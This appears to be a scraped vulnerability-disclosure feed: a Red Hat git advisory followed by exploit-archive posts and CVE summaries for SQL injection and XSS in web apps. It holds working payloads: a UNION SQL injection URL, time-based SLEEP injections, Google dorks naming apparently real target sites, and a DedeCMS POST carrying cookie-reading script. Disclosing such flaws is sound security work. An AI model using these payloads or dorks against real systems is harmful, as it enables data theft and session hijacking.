Red Hat Security Advisory 2023-3248-01 - Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: git security update  
Advisory ID:       RHSA-2023:3248-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3248  
Issue date:        2023-05-22  
CVE Names:         CVE-2023-25652 CVE-2023-25815 CVE-2023-29007  
====================================================================  
1. Summary:

An update for git is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Git is a distributed revision control system with a decentralized  
architecture. As opposed to centralized version control systems with a  
client-server model, Git ensures that each working copy of a Git repository  
is an exact copy with complete revision history. This not only allows the  
user to work on and contribute to projects without the need to have  
permission to push the changes to their official repositories, but also  
makes it possible for the user to work with no network connection.

Security Fix(es):

* git: by feeding specially crafted input to `git apply --reject`, a path  
outside the working tree can be overwritten with partially controlled  
contents (CVE-2023-25652)

* git: arbitrary configuration injection when renaming or deleting a  
section from a configuration file (CVE-2023-29007)

* git: malicious placement of crafted messages when git was compiled with  
runtime prefix (CVE-2023-25815)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2188333 - CVE-2023-25652 git: by feeding specially crafted input to `git apply --reject`, a path outside the working tree can be overwritten with partially controlled contents  
2188337 - CVE-2023-25815 git: malicious placement of crafted messages when git was compiled with runtime prefix  
2188338 - CVE-2023-29007 git: arbitrary configuration injection when renaming or deleting a section from a configuration file

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
git-2.31.1-5.el9_0.src.rpm

aarch64:  
git-2.31.1-5.el9_0.aarch64.rpm  
git-core-2.31.1-5.el9_0.aarch64.rpm  
git-core-debuginfo-2.31.1-5.el9_0.aarch64.rpm  
git-credential-libsecret-2.31.1-5.el9_0.aarch64.rpm  
git-credential-libsecret-debuginfo-2.31.1-5.el9_0.aarch64.rpm  
git-daemon-2.31.1-5.el9_0.aarch64.rpm  
git-daemon-debuginfo-2.31.1-5.el9_0.aarch64.rpm  
git-debuginfo-2.31.1-5.el9_0.aarch64.rpm  
git-debugsource-2.31.1-5.el9_0.aarch64.rpm  
git-subtree-2.31.1-5.el9_0.aarch64.rpm

noarch:  
git-all-2.31.1-5.el9_0.noarch.rpm  
git-core-doc-2.31.1-5.el9_0.noarch.rpm  
git-email-2.31.1-5.el9_0.noarch.rpm  
git-gui-2.31.1-5.el9_0.noarch.rpm  
git-instaweb-2.31.1-5.el9_0.noarch.rpm  
git-svn-2.31.1-5.el9_0.noarch.rpm  
gitk-2.31.1-5.el9_0.noarch.rpm  
gitweb-2.31.1-5.el9_0.noarch.rpm  
perl-Git-2.31.1-5.el9_0.noarch.rpm  
perl-Git-SVN-2.31.1-5.el9_0.noarch.rpm

ppc64le:  
git-2.31.1-5.el9_0.ppc64le.rpm  
git-core-2.31.1-5.el9_0.ppc64le.rpm  
git-core-debuginfo-2.31.1-5.el9_0.ppc64le.rpm  
git-credential-libsecret-2.31.1-5.el9_0.ppc64le.rpm  
git-credential-libsecret-debuginfo-2.31.1-5.el9_0.ppc64le.rpm  
git-daemon-2.31.1-5.el9_0.ppc64le.rpm  
git-daemon-debuginfo-2.31.1-5.el9_0.ppc64le.rpm  
git-debuginfo-2.31.1-5.el9_0.ppc64le.rpm  
git-debugsource-2.31.1-5.el9_0.ppc64le.rpm  
git-subtree-2.31.1-5.el9_0.ppc64le.rpm

s390x:  
git-2.31.1-5.el9_0.s390x.rpm  
git-core-2.31.1-5.el9_0.s390x.rpm  
git-core-debuginfo-2.31.1-5.el9_0.s390x.rpm  
git-credential-libsecret-2.31.1-5.el9_0.s390x.rpm  
git-credential-libsecret-debuginfo-2.31.1-5.el9_0.s390x.rpm  
git-daemon-2.31.1-5.el9_0.s390x.rpm  
git-daemon-debuginfo-2.31.1-5.el9_0.s390x.rpm  
git-debuginfo-2.31.1-5.el9_0.s390x.rpm  
git-debugsource-2.31.1-5.el9_0.s390x.rpm  
git-subtree-2.31.1-5.el9_0.s390x.rpm

x86_64:  
git-2.31.1-5.el9_0.x86_64.rpm  
git-core-2.31.1-5.el9_0.x86_64.rpm  
git-core-debuginfo-2.31.1-5.el9_0.x86_64.rpm  
git-credential-libsecret-2.31.1-5.el9_0.x86_64.rpm  
git-credential-libsecret-debuginfo-2.31.1-5.el9_0.x86_64.rpm  
git-daemon-2.31.1-5.el9_0.x86_64.rpm  
git-daemon-debuginfo-2.31.1-5.el9_0.x86_64.rpm  
git-debuginfo-2.31.1-5.el9_0.x86_64.rpm  
git-debugsource-2.31.1-5.el9_0.x86_64.rpm  
git-subtree-2.31.1-5.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25652  
https://access.redhat.com/security/cve/CVE-2023-25815  
https://access.redhat.com/security/cve/CVE-2023-29007  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGskgdzjgjWX9erEAQj5DA//e9/tITQA5CIJBEKojXtF/rGbRLbt3ns9  
fez8K07pUEBnzVr0JF91Rem+NBqblyWtLIxGHrgG49Jgq5oyl3CWQwHVoet+kg9m  
Op4rA3Wll1B3OyHak7FsXNveLK8IU39qiKWo6DeWyj5fTeJCjb0Bi7lziSBAOsIY  
i8vQHa9kx4WdgTIwXj+b8nEr718UAVgO8N/d82sqS9dL4R1y0gTkDZDGNFs69edw  
p0d9YEbWBc4Ucj/Mp3NIK8O3mz+NLrtKdvcwk8s/3s6xtVR2FckpIq4zDpvlZhMT  
OIj5G04ig/UshzMWrmGEnqucKyH9MvTuKJ3Le/rQDCAwYYyDYMRdzmFOr39lIvxD  
mm6gc+JzJLl2RLOSqDkp+wmeA9Yvw6hcltysqLAsDPYxmiwveOEguAnZUJh6oOXl  
WYWZha84aUzFqdP24kuZ4gK+BHetMIL5uXfxHDILhaxuzWibC/VcN3o7dOxEp2lw  
Gk/tO7I35FznCeZibQA85doGDoBMR+OUdm3kHEXO4BMn6TV5nC8MUrbcpipv5spN  
nqxpkDWSRlrUln5l8mWbw9hWKIqFnkG/+zVUumgJygVJq8l7KtaDty7NLKn8J01r  
Wa8AnPc5idUTinlTmzFzvNFEtzC32gA6wDMWjNUTTWmBJAUboDlas6cRRfjFfiGL  
QSX2fDzbwrQ=jpwm  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3248-01

WBiz Desk version 1.2 suffers from a remote SQL injection vulnerability.

    [#] Exploit Title: WBiz Desk 1.2 - SQL Injection[#] Exploit Date: May 12, 2023.[#] CVSS 3.1: 6.4 (Medium)[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N[#] Tactic: Initial Access (TA0001)[#] Technique: Exploit Public-Facing Application (T1190)[#] Application Name: WBiz Desk[#] Application Version: 1.2[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system[#] Author: h4ck3r - Faisal Albuloushi[#] Contact: SQL@hotmail.co.uk[#] Blog: https://www.0wl.tech[#] 3xploit:[path]//ticket.php?tk=[SQL Injection][#] 3xample:[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -[#] Notes:- The vulnerability requires a non-admin privilege (normal) user to be exploited.

WBiz Desk 1.2 SQL Injection

Esg version 2.5 suffers from a remote SQL injection vulnerability.

    ===========================================================================================| # Title     : Esg 2.5 Sql Injection Vulnerability                                       || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : news.php?tayear=2023[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?tayear=2023 <==== inject here[+] Panel : /admin/login.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Esg 2.5 SQL Injection

Code Bakers version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Code Bakers v1.0 SQL injection Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.codebakers.co.uk/                                                                                      |  | # Dork      : "dishes.php?res_id="                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /dishes.php?res_id= <===== inject here [+] https://127.0.0.1/talwarabazaar.com/dishes.php?res_id=5Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Code Bakers 1.0 SQL Injection

Wekan v6.84 and earlier is vulnerable to Cross Site Scripting (XSS). An attacker with user privilege on kanban board can insert JavaScript code in in "Reaction to comment" feature.

CVE-2023-31779: wekan/CHANGELOG.md at master · wekan/wekan

 SQL Injection in GitHub repository unilogies/bumsys prior to 2.2.0.

**Description**

An administrator user can use different operations and parameters to execute SQL queries.

\-customerId on operations getCustomerPaymentInfo and getCustomerStatementInfo.

\-empId on operations getEmpSalaryData, getEmpLoanLoanData, getEmployeeAdvancePaymentsData.

\-company_id on operation getCompanyDueBillDetails.

A similar case was reported and fixed on productDetailsForReturn operation in this bounty, but this endpoints are still vulnerable.

**Proof of Concept**

All the vulnerable php code is in core/ajax/ajax_data.php.

**customerId Parameter**

There are 3 different points where an SQL Injection can be triggered with customerId parameter.

First of them is on line 827, on getCustomerPaymentInfo operation. The parameter is obtained from query on line 792 and it is sanitized with safe_input method.

However, the parameter is setted on the SQL Query assuming that is an Integer and it is not enforced using quotes:

That's why we can inject malicious SQL Queries as:

customerId=1+OR+(SELECT+SLEEP(5))

As we can see, the response is delayed 5 seconds because it is executing the Sleep.

The second and third vulnerable codes are on getCustomerStatementInfo, on lines 899 and 938, where the customerId is also appended without quotes:

In this case, as the customerId is used in 2 different queries, we can see that the request is delayed 2 times (10 seconds).

**empId Parameter**

There are 3 different points where an SQL Injection can be triggered with empId parameter.

First of them is on line 780, on getEmpSalaryData operation. The parameter is obtained from query on line 764 and it is sanitized with safe_input method.

However, the parameter is setted on the SQL Query assuming that is an Integer and it is not enforced using quotes:

That's why we can inject malicious SQL Queries as:

empId=1+AND+(SELECT+SLEEP(5))

As we can see, the response is delayed 5 seconds because it is executing the Sleep.

The second vulnerable code is on getEmpLoanLoanData, on line 967, where the empId is also appended without quotes:

The third vulnerable code is on getEmployeeAdvancePaymentsData, on line 1045, where the empId is also appended without quotes:

**company\_id Parameter**

The last vulnerable code is on getCompanyDueBillDetails, on line 1092. There is using another parameter, company_id, that it is also sanitised with safe_input method.

However, as in the other cases, it is appended as integer without quotes.

In all this cases, the fix is the same as on the other bounty stated above.

**Impact**

A user with administrator privileges can run SQL queries on database. This can be used to retrieve sensitive data, change database information or any other malicious activity against the database.

**Occurrences**

CVE-2023-2832: SQL Injection in ajax_data.php in bumsys

A vulnerability was found in SourceCodester Class Scheduling System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/edit_subject.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229597 was assigned to this vulnerability.

CVE-2023-2823

A vulnerability classified as critical was found in SourceCodester Online Jewelry Store 1.0. Affected by this vulnerability is an unknown functionality of the file supplier.php of the component POST Parameter Handler. The manipulation of the argument suppid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229429 was assigned to this vulnerability.

CVE-2023-2815

IBM InfoSphere Information Server 11.7 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database.  IBM X-Force ID:  243163.

CVE-2022-47984: IBM InfoSphere Information Server SQL injection CVE-2022-47984 Vulnerability Report

DedeCMS up to v5.7.108 is vulnerable to XSS in sys_info.php via parameters 'edit___cfg_powerby' and 'edit___cfg_beian'

Permalink

DedeCMS up to V5.7.108 XSS vulnerability The vulnerable file is sys\_info.php and the vulnerable parameter is 'edit\_\_\_cfg\_powerby' and 'edit\_\_\_cfg\_beian'

POC below:

    POST /dedecms/uploads/dede/sys_info.php HTTP/1.1
    ******************************************************
    
    token=23aada1a3ad5a8dc6de2cecbf03c8e5e&dopost=save&edit___cfg_basehost=http%3A%2F%2F8.38.80.109&edit___cfg_indexurl=%2Fdedecms%2Fuploads&edit___cfg_indexname=%E4%B8%BB%E9%A1%B5&edit___cfg_webname=%E6%88%91%E7%9A%84%E7%BD%91%E7%AB%99&edit___cfg_arcdir=%2Fa&edit___cfg_medias_dir=%2Fuploads&edit___cfg_fck_xhtml=N&edit___cfg_df_style=default&edit___cfg_powerby=Copyright+%26copy%3B+2007-2021+%E4%B8%8A%E6%B5%B7%E5%8D%93%E5%8D%93%E7%BD%91%E7%BB%9C%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8%0D%0A%3Cscript%3Ealert%28%27xss+again+hahaha%27%29%3C%2Fscript%3E&edit___cfg_keywords=&edit___cfg_description=&edit___cfg_beian=%3Cimg+src%3D1+onerror%3Dalert%28document.cookie%29%3E&edit___cfg_cmspath=%2Fdedecms%2Fuploads&edit___cfg_cookie_encode=C803vUgcGAwTNye55G9i8UwpXIMXNQ4&edit___cfg_backup_dir=backupdata&edit___cfg_adminemail=admin%40dedecms.com&edit___cfg_html_editor=wangEditor&edit___cfg_domain_cookie=&edit___cfg_specnote=6&edit___cfg_list_symbol=+%3E+&edit___cfg_keyword_replace=Y&edit___cfg_multi_site=N&edit___cfg_dede_log=N&edit___cfg_ftp_host=&edit___cfg_ftp_port=21&edit___cfg_ftp_user=&edit___cfg_ftp_pwd=&edit___cfg_ftp_root=%2F&edit___cfg_ftp_mkdir=N&edit___cfg_cli_time=8&edit___cfg_sendmail_bysmtp=Y&edit___cfg_smtp_server=smtp.qq.com&edit___cfg_smtp_port=25&edit___cfg_smtp_usermail=desdev%40vip.qq.com&edit___cfg_smtp_user=desdev&edit___cfg_smtp_password=desdev&edit___cfg_online_type=nps&edit___cfg_upload_switch=Y&edit___cfg_allsearch_limit=1&edit___cfg_rewrite=N&edit___cfg_delete=Y&edit___cfg_typedir_df=Y&edit___cfg_remote_site=N&edit___cfg_title_site=N&edit___cfg_mysql_type=mysql&edit___cfg_timeout_exit=1800&edit___cfg_archives_log=N&edit___cfg_fail_limit=5&edit___cfg_lock_time=3600&edit___cfg_ddimg_width=240&edit___cfg_ddimg_height=180&edit___cfg_imgtype=jpg%7Cgif%7Cpng&edit___cfg_softtype=zip%7Cgz%7Crar%7Ciso%7Cdoc%7Cxsl%7Cppt%7Cwps&edit___cfg_mediatype=swf%7Cmpg%7Cmp3%7Cmp4%7Crm%7Crmvb%7Cwmv%7Cwma%7Cwav%7Cmid%7Cmov&edit___cfg_album_width=800&edit___cfg_album_row=3&edit___cfg_album_col=4&edit___cfg_album_pagesize=12&edit___cfg_album_style=2&edit___cfg_album_ddwidth=200&edit___cfg_max_face=50&edit___cfg_addon_savetype=ymd&edit___cfg_qk_uploadlit=Y&edit___cfg_ddimg_full=N&edit___cfg_ddimg_bgcolor=0&edit___cfg_uplitpic_cut=Y&edit___cfg_album_mark=N&edit___cfg_mb_open=N&edit___cfg_mb_album=Y&edit___cfg_mb_upload=Y&edit___cfg_mb_upload_size=1024&edit___cfg_mb_sendall=Y&edit___cfg_mb_rmdown=Y&edit___cfg_mb_addontype=swf%7Cmpg%7Cmp3%7Cmp4%7Crm%7Crmvb%7Cwmv%7Cwma%7Cwav%7Cmid%7Cmov%7Czip%7Crar%7Cdoc%7Cxsl%7Cppt%7Cwps&edit___cfg_mb_max=500&edit___cfg_mb_notallow=www%2Cbbs%2Cftp%2Cmail%2Cuser%2Cusers%2Cadmin%2Cadministrator&edit___cfg_mb_idmin=3&edit___cfg_mb_pwdmin=3&edit___cfg_mb_pwdtype=32&edit___cfg_md_idurl=N&edit___cfg_mb_rank=10&edit___cfg_md_mailtest=N&edit___cfg_mb_spacesta=-10&edit___cfg_mb_allowncarc=Y&edit___cfg_mb_allowreg=Y&edit___cfg_mb_adminlock=N&edit___cfg_mb_spaceallarc=0&edit___cfg_mb_wnameone=N&edit___cfg_mb_feedcheck=N&edit___cfg_mb_msgischeck=N&edit___cfg_mb_reginfo=Y&edit___cfg_notallowstr=%E9%9D%9E%E5%85%B8%7C%E8%89%BE%E6%BB%8B%E7%97%85%7C%E9%98%B3%E7%97%BF&edit___cfg_replacestr=%E5%A5%B9%E5%A6%88%7C%E5%AE%83%E5%A6%88%7C%E4%BB%96%E5%A6%88%7C%E4%BD%A0%E5%A6%88%7C%E5%8E%BB%E6%AD%BB%7C%E8%B4%B1%E4%BA%BA&edit___cfg_feedbackcheck=N&edit___cfg_feedback_ck=Y&edit___cfg_feedback_time=30&edit___cfg_feedback_numip=30&edit___cfg_vdcode_member=Y&edit___cfg_mb_cktitle=Y&edit___cfg_mb_editday=7&edit___cfg_caicai_sub=2&edit___cfg_caicai_add=2&edit___cfg_feedback_add=5&edit___cfg_feedback_sub=5&edit___cfg_feedback_forbid=N&edit___cfg_sendarc_scores=10&edit___cfg_sendfb_scores=3&edit___cfg_face_adds=10&edit___cfg_moreinfo_adds=20&edit___cfg_money_scores=50&edit___cfg_login_adds=2&edit___cfg_userad_adds=10&edit___cfg_feedback_guest=N&edit___cfg_arcsptitle=N&edit___cfg_arcautosp=N&edit___cfg_arcautosp_size=5&edit___cfg_list_son=Y&edit___cfg_keyword_like=N&edit___cfg_index_max=10000&edit___cfg_index_cache=86400&edit___cfg_tplcache=Y&edit___cfg_tplcache_dir=%2Fdata%2Ftplcache&edit___cfg_makesign_cache=N&edit___cfg_search_max=50000&edit___cfg_search_maxrc=300&edit___cfg_search_time=3&edit___cfg_need_typeid2=Y&edit___cfg_cache_type=id&edit___cfg_makeindex=N&edit___cfg_make_andcat=N&edit___cfg_make_prenext=Y&edit___cfg_puccache_time=36000&edit___cfg_memcache_enable=N&edit___cfg_memcache_mc_defa=memcache%3A%2F%2F127.0.0.1%3A11211%2Fdefault127&edit___cfg_memcache_mc_oth=&edit___cfg_digg_update=0&edit___cfg_disable_funs=phpinfo%2Ceval%2Cassert%2Cexec%2Cpassthru%2Cshell_exec%2Csystem%2Cproc_open%2Cpopen%2Ccurl_exec%2Ccurl_multi_exec%2Cparse_ini_file%2Cshow_source%2Cfile_put_contents%2Cfsockopen%2Cfopen%2Cfwrite%2Cpreg_replace&edit___cfg_disable_tags=php&edit___cfg_auot_description=240&edit___cfg_rm_remote=Y&edit___cfg_arc_dellink=N&edit___cfg_arc_autopic=Y&edit___cfg_arc_autokeyword=Y&edit___cfg_title_maxlen=60&edit___cfg_check_title=Y&edit___cfg_jump_once=Y&edit___cfg_task_pwd=&edit___cfg_addon_domainbind=N&edit___cfg_addon_domain=&edit___cfg_df_dutyadmin=admin&edit___cfg_arc_dirname=Y&edit___cfg_arc_click=-1&edit___cfg_replace_num=2&edit___cfg_replace_total=0&edit___cfg_replace_sort=1&edit___cfg_sphinx_article=N&edit___cfg_sphinx_host=localhost&edit___cfg_sphinx_port=9312&edit___cfg_cross_sectypeid=N&edit___cfg_baidunews_limit=100&edit___cfg_updateperi=15&imageField.x=25&imageField.y=14
    
    

Reproduce:

XSS triggered:

Tag

#sql